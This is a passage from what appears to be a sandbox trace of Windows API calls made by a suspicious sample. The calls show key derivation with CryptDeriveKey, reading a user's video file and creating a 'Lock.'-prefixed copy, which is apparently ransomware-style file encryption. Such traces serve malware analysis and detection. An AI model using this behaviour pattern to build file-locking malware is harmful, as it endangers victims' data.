wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0112.723] CryptHashData (hHash=0x9a4800, pbData=0x2a71c88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0112.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.723] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0112.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.723] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0112.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0112.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa348, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0112.724] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9a4800, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4880) returned 1 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.724] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0112.724] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0112.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0112.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0112.724] CryptDestroyHash (hHash=0x9a4800) returned 1 [0112.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-M_4r.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-m_4r.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0112.725] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.725] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0112.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0112.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0112.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0112.727] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0112.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.-M_4r.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.-m_4r.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0112.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0112.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0112.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0112.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0112.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0112.730] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0112.730] ReadFile (in: hFile=0x4b0, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0112.732] ReadFile (in: hFile=0x4b0, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x5075, lpOverlapped=0x0) returned 1 [0112.732] ReadFile (in: hFile=0x4b0, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0112.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0112.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0112.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0112.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15075) returned 0x2a7a130 [0112.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cbd020 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0112.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0112.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15075) returned 0x2a8f1b0 [0112.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0112.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0112.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0112.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0112.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0112.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15075) returned 0x2a7a130 [0112.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0112.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0112.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0112.740] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0112.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0112.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15075) returned 0x2a7a130 [0112.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0112.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0112.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0112.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa198 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0112.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0112.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15075) returned 0x37c0048 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0112.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0112.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0112.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0112.746] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0112.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0112.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 